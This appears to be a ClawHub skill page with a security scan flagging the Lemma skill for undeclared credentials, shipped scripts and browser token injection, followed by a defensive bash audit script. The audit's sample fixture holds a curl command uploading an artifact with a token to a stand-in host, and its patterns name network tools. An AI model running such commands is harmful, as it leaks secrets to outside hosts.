Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Lemma
v1.0.0 · Lemma is an AI operating system platform for business teams. Use this as the single entrypoint when designing, provisioning, testing, or improving Lemma pods...
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious · medium confidence
Purpose & Capability
The skill's name and description match the included module guides and developer workflows, but the repository contains runtime scripts, and many of the guides assume environment variables (LEMMA_TOKEN, LEMMA_BASE_URL, LEMMA_POD_ID, VITE_LEMMA_*, etc.) and browser token injection. The registry metadata claims no required env vars or credentials, which contradicts the guidance in the docs. That mismatch is unexpected and should be justified before the skill is trusted.
Instruction Scope
SKILL.md routes the agent to many module GUIDE.md files that instruct it to run CLI commands, start long-lived shells, curl LEMMA_BASE_URL, inject auth tokens into browser localStorage, use playwright-cli, and run included shell scripts (e.g., ./modules/lemma-desks/scripts/init-artifact.sh). The instructions therefore involve reading and using workspace env vars and performing network calls, actions outside a strictly read-only documentation skill. They declare no limits on how tokens may be used or where data may be sent, and the browser-local token injection they call for can expose credentials: a token placed in localStorage is readable by any script running on that origin, so a publicly reachable preview URL or any injected script is enough to leak it.
Install Mechanism
There is no install spec (the skill is instruction-only), which is low risk for automatic installs. However, the package includes several shell scripts (notably init-artifact.sh and bundle-artifact.sh). Because the bundle ships executable scripts, an agent following the guides could run them, and SKILL.md does not describe what they do. The absence of an installation step reduces supply-chain risk, but embedded scripts still deserve inspection before execution.
Credentials
The skill declares no required environment variables or credentials, yet the module guides repeatedly assume sensitive env vars (LEMMA_TOKEN, LEMMA_BASE_URL, LEMMA_AUTH_URL, LEMMA_POD_ID and VITE_LEMMA_*). The guides also instruct injecting tokens into browser localStorage for testing. Requesting or assuming these secrets without declaring them is disproportionate and opaque; users should confirm which credentials are actually needed and avoid using high-privilege or production tokens for testing.
Persistence & Privilege
Flags show always:false and default autonomous invocation allowed. The skill does not request persistent inclusion or modify other skills. This is normal; no elevated platform privileges are requested in the metadata.
What to consider before installing
This package looks like in-repo product documentation and developer tooling for the Lemma platform, not a small single-purpose helper, so treat it as source code you will run. Before installing or executing anything:
1) Inspect the included shell scripts (especially init-artifact.sh and bundle-artifact.sh) to confirm they do only expected, local operations and do not call external URLs you do not trust; a quick first pass is to search them for curl, wget, nc, ssh and http(s):// and read every hit in context.
2) Do not paste a production LEMMA_TOKEN or other high-privilege credentials into workspace previews or browser localStorage; use a least-privilege, short-lived test token and rotate it afterward.
3) Confirm the required environment variables and their minimum needed scopes: the skill's metadata claims none, but the docs expect many.
4) Run any scripts in an isolated dev workspace (not on a machine holding production secrets), and prefer to dry-run commands or read their contents first.
5) If you need stronger assurance, provide the full contents of the larger scripts for a deeper review; if those scripts make outbound network calls or upload artifacts, consider the skill suspicious until those calls are audited.
Like a lobster shell, security has layers — review code before you run it.
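The following is an added example, not code from this ClawHub page, the scanner, or the Lemma skill: a bash pre-install audit that mechanises checks 1 and 3 above against an unpacked skill bundle. It reports every LEMMA_* / VITE_LEMMA_* name the guides reference but the metadata does not declare, every line in a shell script that reaches the network, and every instruction to inject a token into browser storage, then gives a verdict. The bundle it audits is constructed inline so the script runs offline; its file names (setup.sh, publish.sh), guide text and the "requiredEnv: [...]" metadata line are assumptions, since the page does not show ClawHub's real manifest format. For a real bundle, call audit_report on the unpacked directory instead.

```shell
#!/usr/bin/env bash
# Added example: offline pre-install audit of an unpacked skill bundle.
# Not part of the ClawHub page, the scanner, or the Lemma skill. The bundle
# built by make_sample_bundle is constructed for this demo; its file names,
# script contents and the "requiredEnv:" metadata line are assumptions.

# Network-capable tools or URLs inside shell scripts: read every hit before running.
NET_RE='(^|[^A-Za-z0-9_])(curl|wget|nc|ncat|ssh|scp|rsync)([^A-Za-z0-9_]|$)|https?://'

# Browser-side token injection: a token in localStorage is readable by any
# script on that origin, so these instructions are worth flagging.
TOKEN_RE='localStorage\.setItem|sessionStorage\.setItem|document\.cookie *='

# Every LEMMA_* / VITE_LEMMA_* name referenced anywhere in the bundle.
env_referenced() {
  LC_ALL=C grep -rhoE '(VITE_)?LEMMA_[A-Z0-9_]+' "$1" | LC_ALL=C sort -u
}

# Names the metadata declares (assumed format: "requiredEnv: [A, B]" in SKILL.md).
env_declared() {
  sed -n 's/^requiredEnv: *\[\(.*\)\].*/\1/p' "$1/SKILL.md" |
    tr ',' '\n' | tr -d ' ' | grep . | LC_ALL=C sort -u
}

# Referenced but undeclared: the metadata/docs mismatch the scan report calls out.
env_undeclared() {
  local declared name
  declared=" $(env_declared "$1" | tr '\n' ' ') "
  env_referenced "$1" | while IFS= read -r name; do
    case "$declared" in
      *" $name "*) ;;
      *) printf '%s\n' "$name" ;;
    esac
  done
}

# Lines in *.sh files that reach the network, as file:line:text.
net_calls_in_scripts() {
  find "$1" -type f -name '*.sh' | LC_ALL=C sort | while IFS= read -r f; do
    grep -nHE "$NET_RE" "$f" || :
  done
}

# Lines anywhere in the bundle that tell the user to inject a token in the browser.
token_injection() {
  LC_ALL=C grep -rnE "$TOKEN_RE" "$1" || :
}

# Prints "ok" and returns 0 only when all three checks come back empty.
verdict() {
  local problems=0
  if [ -n "$(env_undeclared "$1")" ]; then problems=$((problems + 1)); fi
  if [ -n "$(net_calls_in_scripts "$1")" ]; then problems=$((problems + 1)); fi
  if [ -n "$(token_injection "$1")" ]; then problems=$((problems + 1)); fi
  if [ "$problems" -gt 0 ]; then echo suspicious; return 1; fi
  echo ok
}

audit_report() {
  echo "== env vars referenced but not declared"; env_undeclared "$1"
  echo "== network calls inside shell scripts";   net_calls_in_scripts "$1"
  echo "== browser token injection instructions"; token_injection "$1"
  echo "== verdict";                               verdict "$1"
}

# Constructed sample bundle (hypothetical contents) mirroring the report's findings:
# metadata declares one variable, the guide uses four and injects a token, and one
# script uploads an artifact with the token in the URL.
make_sample_bundle() {
  mkdir -p "$1/modules/demo/scripts"
  printf 'name: sample-skill\nrequiredEnv: [LEMMA_BASE_URL]\n' > "$1/SKILL.md"
  cat > "$1/modules/demo/GUIDE.md" <<'EOF'
Export LEMMA_TOKEN and LEMMA_BASE_URL, then fetch the pod:
curl -H "Authorization: Bearer $LEMMA_TOKEN" "$LEMMA_BASE_URL/api/pods/$LEMMA_POD_ID"
In the preview's devtools console: localStorage.setItem('token', import.meta.env.VITE_LEMMA_TOKEN)
EOF
  cat > "$1/modules/demo/scripts/setup.sh" <<'EOF'
#!/bin/sh
mkdir -p artifacts && echo initialised > artifacts/README
EOF
  cat > "$1/modules/demo/scripts/publish.sh" <<'EOF'
#!/bin/sh
tar czf artifact.tgz artifacts
curl -s -X POST --data-binary @artifact.tgz "https://uploads.example/ingest?token=$LEMMA_TOKEN"
EOF
}

# Stand-alone run: audit the constructed bundle (the verdict exits 1 by design).
demo=$(mktemp -d)
make_sample_bundle "$demo"
audit_report "$demo" || :
rm -rf "$demo"
```

The three checks are deliberately separate functions so that each can be run alone against a real bundle; the network grep only covers *.sh files because a curl line in a GUIDE.md is an instruction to the agent, not code that executes on unpack, and it already surfaces through the undeclared-variable check when it references a LEMMA_* name.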
latest: vk97a31a09hdxtvb8cx38fp1a4h84h6b6
